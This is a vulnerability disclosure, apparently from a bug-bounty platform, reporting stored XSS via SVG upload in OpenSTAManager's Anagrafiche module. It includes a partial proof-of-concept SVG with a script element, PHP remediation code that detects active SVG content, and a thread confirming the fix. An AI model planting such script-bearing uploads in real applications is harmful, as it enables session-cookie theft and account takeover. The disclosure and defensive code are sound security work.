Cross-site Scripting (XSS) - Stored in devcode-it/openstamanager


Reported on

Jul 2nd 2021

✍️ Description

Stored XSS through file upload in the Anagrafiche module.

🕵️‍♂️ Proof of Concept

Go to an existing Anagrafiche or create a new one. Upload a .svg file with the following content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""><svg version="1.1" baseProfile="full" xmlns="">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">

Give the file any name ending in .svg (for example store-xss.svg). When you click on the uploaded image, a new window opens and the injected script runs, popping up an alert that contains the cookie.

💥 Impact

Possible to steal admin cookies or take over another account by grabbing the victim's session cookie.

💥 Remediation

Sanitize user input.
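As an added illustration of that remediation (example code written for this page, not OpenSTAManager's own code; all function, constant and variable names are assumptions), the following PHP does two things a defender would want for an upload feature like Anagrafiche's: it inspects an uploaded SVG for active content (script elements, event-handler attributes, javascript: links, foreignObject) before accepting it, and it builds the response headers that make a stored file download rather than render inline in the application's origin, so that even an SVG that slips through cannot execute as the logged-in user. The sample SVGs at the bottom are constructed for the demonstration.

```php
<?php
declare(strict_types=1);

// Elements that can carry or trigger script inside an SVG document.
const SVG_FORBIDDEN_ELEMENTS = ['script', 'foreignobject', 'iframe', 'embed', 'object', 'animate', 'set'];

/**
 * Returns a list of reasons the SVG is unsafe; an empty list means it passed.
 * The file is parsed as XML (never rendered), with network access disabled.
 */
function svgActiveContent(string $svg): array
{
    $problems = [];
    $dom = new DOMDocument();
    $prevErrors = libxml_use_internal_errors(true);
    // LIBXML_NONET: the parser must not fetch anything referenced by the file.
    // LIBXML_NOENT is deliberately not set, so entities are not expanded.
    $ok = $dom->loadXML($svg, LIBXML_NONET);
    libxml_use_internal_errors($prevErrors);
    if ($ok === false) {
        return ['not well-formed XML'];
    }

    foreach ($dom->getElementsByTagName('*') as $el) {
        $name = strtolower((string) $el->localName);
        if (in_array($name, SVG_FORBIDDEN_ELEMENTS, true)) {
            $problems[] = "element <$name>";
        }
        foreach ($el->attributes as $attr) {
            $aname = strtolower((string) $attr->localName);
            // onload, onclick, onmouseover, ... all execute script.
            if (strncmp($aname, 'on', 2) === 0) {
                $problems[] = "event handler attribute $aname on <$name>";
            }
            // href / xlink:href pointing at a javascript: or data: URL.
            if ($aname === 'href' && preg_match('/^\s*(javascript|data)\s*:/i', $attr->value)) {
                $problems[] = "scriptable href on <$name>";
            }
        }
    }
    return $problems;
}

/**
 * Headers for serving a stored upload. Forcing a download and sandboxing the
 * response means the browser never runs the file in the application's origin,
 * so a stored XSS cannot reach the session cookie.
 */
function uploadResponseHeaders(string $storedName, string $mime): array
{
    return [
        'Content-Type: ' . $mime,
        'X-Content-Type-Options: nosniff',
        'Content-Disposition: attachment; filename="' . rawurlencode(basename($storedName)) . '"',
        "Content-Security-Policy: sandbox; script-src 'none'",
    ];
}

// Constructed samples: a benign shape, and the same shape with active content.
$cleanSvg = '<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0" fill="#009900"/></svg>';
$badSvg   = '<svg xmlns="http://www.w3.org/2000/svg" onload="/* handler */">'
          . '<polygon points="0,0 0,50 50,0"/><script>/* script */</script></svg>';

var_dump(svgActiveContent($cleanSvg));   // array(0) {}
var_dump(svgActiveContent($badSvg));     // lists the onload attribute and the <script> element
print_r(uploadResponseHeaders('store-xss.svg', 'image/svg+xml'));
```

Rejecting files at upload time and serving them with attachment plus a sandboxing CSP are complementary: the first keeps obviously hostile files out, the second limits the damage if a bypass of the element and attribute lists is found. If the application must display uploaded images inline, converting them server-side to a raster format (PNG) removes the problem entirely.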

💥 References

We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 5 months ago
devcode-it/openstamanager maintainer validated this vulnerability 5 months ago
ribersec has been awarded the disclosure bounty
The fix bounty is now up for grabs
devcode-it/openstamanager maintainer confirmed that a fix has been merged on 7ec0bb 5 months ago
The fix bounty has been dropped
devcode-it/openstamanager maintainer
5 months ago

How can we contact you for bounty?

5 months ago

Researcher platform handles the bounty.

devcode-it/openstamanager maintainer
5 months ago

Ok! Many thanks! :-D